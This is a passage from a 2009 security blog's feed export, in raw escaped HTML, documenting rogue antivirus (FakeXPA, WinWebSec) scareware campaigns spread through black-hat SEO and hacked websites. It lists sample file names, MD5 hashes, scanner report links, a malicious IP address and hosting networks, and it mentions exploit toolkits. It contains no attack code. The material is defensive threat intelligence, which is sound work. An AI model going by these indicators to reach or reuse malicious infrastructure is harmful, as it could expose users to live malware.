(13.16%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;&lt;span id="status_nombre3"&gt;N1.exe&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td&gt;527360 Bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td&gt;2d6a49219639d63428b91eb7647ce491&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/0609f9e706d89d88c4974e6e1fa7f132" target="_blank"&gt;Report&lt;/a&gt; Alias: Trojan.Win32/FakeXPA / Trojan.Win32.Tibs&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Received on 03.28.2009 22:09:09 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;5/38 (13.16%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=2d6a49219639d63428b91eb7647ce491" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;&lt;span id="status_nombre4"&gt;QWProtect.dll&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td&gt;697856 Bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td&gt;1b6c35cb941eaa9f6325a449cb6770b0&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/ca7e3abef6b7e32784ae71c4e318f232" target="_blank"&gt;Report&lt;/a&gt; Alias: &lt;span style="color:#FF0000"&gt;Trojan.Win32/FakeXPA&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Received on 03.28.2009 22:09:01 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;4/38 (10.53%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Prevx:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://info.prevx.com/aboutprogramtext.asp?PX5=08C32F6500787727A6D70AF671E49C00FE632D2D" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=1b6c35cb941eaa9f6325a449cb6770b0" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;&lt;span id="status_nombre5"&gt;svchost.exe &lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td&gt;80896 Bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td&gt;c2613b801da4c8b6967d6da05c0443ed&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/094616f46644e51261fb3890e6ddfdcb" target="_blank"&gt;Report&lt;/a&gt; Alias: &lt;span style="color:#FF0000"&gt;Trojan.Win32/FakeXPA&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Received on 03.28.2009 22:08:47 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;10/38 (26.32%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Prevx:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://info.prevx.com/aboutprogramtext.asp?PX5=EB150CF5002DB1BC3C47012344E9CF00C09C3521" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=c2613b801da4c8b6967d6da05c0443ed" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Result when running:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td height="200"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;Display fake BlueScreen &amp;quot;MALWARE.MONSTER.DX_NEW_0xA21518F0&amp;quot; &lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjhFLB_2PI/AAAAAAAAAMg/on_9hSLUXPc/s1600-h/fake-bsod.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjhFLB_2PI/AAAAAAAAAMg/on_9hSLUXPc/s320/fake-bsod.jpg" border="0" alt="Fake bluescreen message: MALWARE.MONSTER.DX_NEW_0xA21518F0"id="BLOGGER_PHOTO_ID_5316746839087634674" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/ScjjL5dpjsI/AAAAAAAAAMo/cMfcqaGeTMI/s1600-h/Anti-Virus+Number-1+Installer.bmp"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 177px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/ScjjL5dpjsI/AAAAAAAAAMo/cMfcqaGeTMI/s320/Anti-Virus+Number-1+Installer.bmp" border="0" alt="Rogue Anti-Virus Number-1"id="BLOGGER_PHOTO_ID_5316749153654116034" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Anti-Virus Number-1 Rogue Application Screenshot:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="200"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6pTxgt6OI/AAAAAAAAAQA/ManMH1wtCBI/s1600-h/anti-virus1.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6pTxgt6OI/AAAAAAAAAQA/ManMH1wtCBI/s320/anti-virus1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318374367144306914" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc6pTk6Y3kI/AAAAAAAAAP4/xCToBtIYOnk/s1600-h/anti_virus_1.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 237px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc6pTk6Y3kI/AAAAAAAAAP4/xCToBtIYOnk/s320/anti_virus_1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318374363762318914" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-574802831309357886?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/574802831309357886'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/574802831309357886'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/03/av-best-info-anti-virusn1-rogue-fakexpa.html' title='av-best-info Anti-VirusN1 Rogue FakeXPA'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc6kNvHPZzI/AAAAAAAAAPg/Gibm24vGSe8/s72-c/Anti-Virus_Number-1-Fake-Anti-Virus1.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-3751716486830821803</id><published>2009-03-27T16:21:00.000-07:00</published><updated>2009-04-20T16:27:25.180-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='zlkon'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='Scareware'/><category scheme='http://www.blogger.com/atom/ns#' term='winwebsecurity'/><category scheme='http://www.blogger.com/atom/ns#' term='rogue av'/><category scheme='http://www.blogger.com/atom/ns#' term='compromised website'/><title type='text'>Black Hat SEO and Rogue Antivirus</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="572" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO and Rogue Antivirus&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;table width="549" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="549"&gt;&lt;p&gt;    Messages telling you to install and update security software for your computer is a scary message. &lt;br /&gt;  This tactic is  known as &lt;a rel="dofollow" href="http://en.wikipedia.org/wiki/Scareware" title="Scareware Definition" target="_blank"&gt;scareware&lt;/a&gt;: http://en.wikipedia.org/wiki/Scareware&lt;br /&gt;&lt;br /&gt;Related article about &amp;quot;Free Security Scan&amp;quot; alerts from the Federal Trade Commission&lt;br /&gt;&lt;a rel="dofollow" href="http://www.ftc.gov/opa/2008/12/winsoftware.shtm" title="Court Halts Bogus Computer Scans" target="_blank"&gt;Court Halts Bogus Computer Scans&lt;/a&gt; &lt;br /&gt;&lt;a rel="dofollow" href="http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt121.shtm" title="&amp;quot;Free Security Scan&amp;quot; Could Cost Time and Money" target="_blank"&gt;&amp;quot;Free Security Scan&amp;quot; Could Cost Time and Money&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt121.pdf" rel="dofollow"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 206px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc0wT27hu1I/AAAAAAAAANg/3Of3Qi_YVgs/s320/FTC_ConsumerAlert.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5317959852715260754" /&gt;&lt;/a&gt;  &lt;br /&gt;  &lt;br /&gt;Since several months ago, massive attacks (obfuscated javascript inserted - IFRAME to inject backdoors/keyloggers), thousand of hacked websites used to distribute rogue antivirus  have been detected by major antivirus vendors, cyber intelligence labs and other security companies.&lt;br /&gt;  &lt;br /&gt;  The exponential growth of rogue antivirus distribution through legitimate websites remain silent as the tactic used by the creators continued to become more sophisticated.&lt;br /&gt;  &lt;br /&gt;Related article: &lt;a href="http://www.theregister.co.uk/2008/10/16/fake_av_scam/" target="_blank"&gt;Scammers making '$15m a month' on fake antivirus&lt;/a&gt; &lt;br /&gt;PandaLabs: &lt;a href="http://news.prnewswire.com/ViewContent.aspx?ACCT=109&amp;amp;STORY=/www/story/01-08-2009/0004951691&amp;amp;EDATE=" target="_blank"&gt;22,000 New Malware Samples Detected Every Day in 2008&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.pandasecurity.com/enterprise/security-info/tools/reports.html" target="_blank"&gt;PandaLabs Annual Report&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;table width="426" height="204" border="0" cellpadding="0" cellspacing="0" style="background:url(http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc0q9veZdlI/AAAAAAAAANQ/Lav1ymd6cvA/s400/Rogue-AV-Detections.jpg) no-repeat;"&gt;&lt;tr&gt;&lt;td width="412" height="190" valign="top" style="padding-left:35px; padding-top:35px; color: #333; font-size:14px; font-weight:bold"&gt;Rogue AV Detections in 2008&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;Sites on this blog refers to rogue antispyware which display misleading scan alerts and mostly installed on computer's victim without user consent throught infected websites (LEGITIMATE infected websites).&lt;br /&gt;&lt;br /&gt;&lt;hr  /&gt;UPDATE:&lt;br /&gt;&lt;br /&gt;The site now include  IPs / botnet C&amp;amp;C /  data logs exposed, links to LIVE urls exploits/vulnarabilities (flash - pdf) and domains with their relations, route, AS and malicious scripts found on&lt;br /&gt;compromised websites related to the same campaign.&lt;br /&gt;&lt;br /&gt;&lt;hr  /&gt;&lt;br /&gt;    If you arrived to this page through a search engine about a domain in this blog, some removal information can be found on the links below. Sites analysis will be created and updated as new sites will be found. Twice or more a day if needed.&lt;/p&gt;&lt;p&gt;If you arrived to this page and you are interested to find some information about these attacks, &lt;br /&gt;IPs domains and networkd used, here are some links  used with details about this malware campaign &lt;br /&gt;  &lt;br /&gt;Related article:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://malware-web-threats.blogspot.com/2009/03/easywinscanner17com-fake-scanner.html" target="_blank"&gt;Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard Malware Defender 2009&lt;/a&gt;&lt;br /&gt;&lt;a href="http://malware-web-threats.blogspot.com/2009/03/securedpaymentsystemcom-antivirus360.html" target="_blank"&gt;Black Hat SEO and Rogue Antivirus: Fraudulent payment processors Antivirus360&lt;/a&gt;&lt;br /&gt;&lt;a href="http://malware-web-threats.blogspot.com/2009/03/easynetcheckonline-fraudtool-win32.html" target="_blank"&gt;Black Hat SEO and Rogue Antivirus: Fake Scanner RapidAntivirus templ. AntivirusPlus &lt;/a&gt; &lt;br /&gt;&lt;a href="http://malware-web-threats.blogspot.com/2009/03/mostpopularscancom-browser-hijacker.html"&gt;Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro&lt;/a&gt;&lt;br /&gt;&lt;a href="http://malware-web-threats.blogspot.com/2009/03/stabilityinetscan-zlkon-malware-drop.html" target="_blank"&gt;Black Hat SEO and Rogue Antivirus: ZlKon Malware Drop&lt;/a&gt;&lt;br /&gt;&lt;a href="http://malware-web-threats.blogspot.com/2009/03/antispyware-pro-2009-spyware-threat.html" target="_blank"&gt;Black Hat SEO and Rogue Antivirus: AntiSpyware Pro 2009&lt;/a&gt;  &lt;br /&gt;&lt;a href="http://malware-web-threats.blogspot.com/2009/03/systemguard2009-spyware-new-rogue.html" target="_blank"&gt;Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard&lt;/a&gt;&lt;br /&gt;&lt;a href="http://malware-web-threats.blogspot.com/2009/03/systemsecurity2009-spread-new-variants.html"&gt;Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro&lt;/a&gt; &lt;br /&gt;&lt;a href="http://malware-web-threats.blogspot.com/2009/03/internetantiviruspro-spyware-spread-new.html"&gt;Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro new variants&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Black Hat SEO and Rogue Antivirus:&lt;br /&gt;&lt;br /&gt;Part. 1) &lt;a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html"&gt;Black Hat SEO and Rogue Antivirus&lt;/a&gt;&lt;br /&gt;Part. 2) &lt;a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p2.html"&gt;Black Hat SEO and Rogue Antivirus: The World Wide Web Consortium Mystery&lt;/a&gt;                &lt;br /&gt;Part. 3) &lt;a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p3.html" target="_blank"&gt;Black Hat SEO and Rogue Antivirus: AntivirusPlus ZlKon and liveinternetmarketingltd.com&lt;/a&gt; &lt;br /&gt;Part. 4) &lt;a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p4.html" target="_blank"&gt;Black Hat SEO and Rogue Antivirus: Full or Rogues&lt;/a&gt; &lt;br /&gt;Part. 5) &lt;a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p5.html" target="_blank"&gt;Black Hat SEO and Rogue Antivirus: Full of Hacks&lt;/a&gt;&lt;br /&gt;Part. 6) &lt;a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p6.html" target="_blank"&gt;Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.1&lt;/a&gt;&lt;br /&gt;Part. 7) &lt;a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p7.html" target="_blank"&gt;Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.2&lt;/a&gt;&lt;br /&gt;Part. 8) &lt;a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p8.html" target="_blank"&gt;Black Hat SEO and Rogue Antivirus: Fake AV + Rootkit TDSS / Alureon / DNSChanger&lt;/a&gt;  &lt;br /&gt;&lt;br /&gt;Black Hat SEO - Exploit, scripts, botnet C&amp;amp;C, hacks toolkit etc.&lt;br /&gt;&lt;br /&gt;Part. 1) &lt;a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-rbn-hacks-p1.html"&gt;Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Thousand of domain attacked&lt;/a&gt;&lt;br /&gt;
Part. 2) &lt;a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-rbn-hacks-p2.html"&gt;Black Hat SEO - Cyber Crime Toolkit Exposed: Welcome to LuckySploit:) ITS TOASTED&lt;/a&gt;&lt;br /&gt;Part. 3) &lt;a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-rbn-hacks-p3.html"&gt;Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Triple threats&lt;/a&gt;&lt;br /&gt;
Part. 3) &lt;a href="http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-rbn-hacks-p4.html"&gt;Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Crimaware toolkits in the wild&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;And here we have a list of fake scanner websites used in the attack which infect thousand of websites to distribute malware also known as WinWebSec (WinWebSecurity or SystemSecurity2009): &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html" title="Black Hat SEO and Rogue Antivirus"&gt;Black Hat SEO and Rogue Antivirus&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;Note&lt;/u&gt;: &lt;br /&gt;&lt;br /&gt;Other rogue av like &lt;b&gt;AntivirusPlus&lt;/b&gt; through &lt;a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p3.html"&gt;this list&lt;/a&gt; has been detected recently&lt;br /&gt;&lt;br /&gt;Many more like under the name of &lt;b&gt;FakeSpyGuard&lt;/b&gt;, &lt;b&gt;VirusRemover&lt;/b&gt;, &lt;b&gt;WinAntiVirus2008&lt;/b&gt;, &lt;b&gt;SpywareRemover2009&lt;/b&gt;, and some variant of &amp;quot;Trojan Hiloti&amp;quot; through &lt;a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus-p4.html"&gt;this list&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  &lt;u&gt;Similar attacks  with Google search strings&lt;/u&gt; :&lt;br /&gt;&lt;br /&gt;In 2008: We have an example with &amp;quot;Antivirus 2009&amp;quot; on the Trend Micro Malware Blog: &lt;br /&gt;&lt;a href="http://blog.trendmicro.com/a-million-search-strings-to-get-infected/" target="_blank"&gt;A Million Search Strings to Get Infected&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A few days ago: On the CA website &amp;quot;onlinestabilityworld.com&amp;quot; is cited. The article is here: &lt;br /&gt;&lt;a href="http://community.ca.com/blogs/securityadvisor/archive/2009/03/19/rogue-security-software-keeps-on-hitting-google-searches.aspx" target="_blank"&gt;Rogue Security Software keeps on hitting Google searches&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Another list  of fake codec websites in March on the Dancho Danchev's blog alsocited on this blog&lt;br /&gt;&lt;a href="http://ddanchev.blogspot.com/2009/04/bogus-linkedin-profiles-redirect-to.html" target="_blank"&gt;Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;And recent search also reveal the use of a powerfull javascript library jQuery - the screenshot below has been retreived from a legitimated infected website.&lt;br /&gt;&lt;br /&gt;Deobfuscated result is:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdG9QypwVpI/AAAAAAAAARQ/OjuxQ03u8X4/s1600-h/js.js.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 15px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdG9QypwVpI/AAAAAAAAARQ/OjuxQ03u8X4/s320/js.js.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5319240731073730194" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The ip is 94.247.2.195 (ZlKon)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;Network used for hosting these malicious website are &lt;br /&gt;  &lt;br /&gt;&lt;b&gt;Starline Web Services&lt;/b&gt; in Estonia&lt;br /&gt;&lt;b&gt;Zlkon&lt;/b&gt; in Latvia&lt;br /&gt;&lt;b&gt;netdirekt e.K.&lt;/b&gt; in Germany&lt;br /&gt;&lt;b&gt;Hetzner Online AG&lt;/b&gt; in Germany &lt;br /&gt;&lt;b&gt;Ural-NET&lt;/b&gt; in Russia&lt;br /&gt;&lt;b&gt;Eurohost LLC&lt;/b&gt; in Ukraine &lt;br /&gt;&lt;b&gt;GloboTech via Olexij Khrenov&lt;/b&gt; in 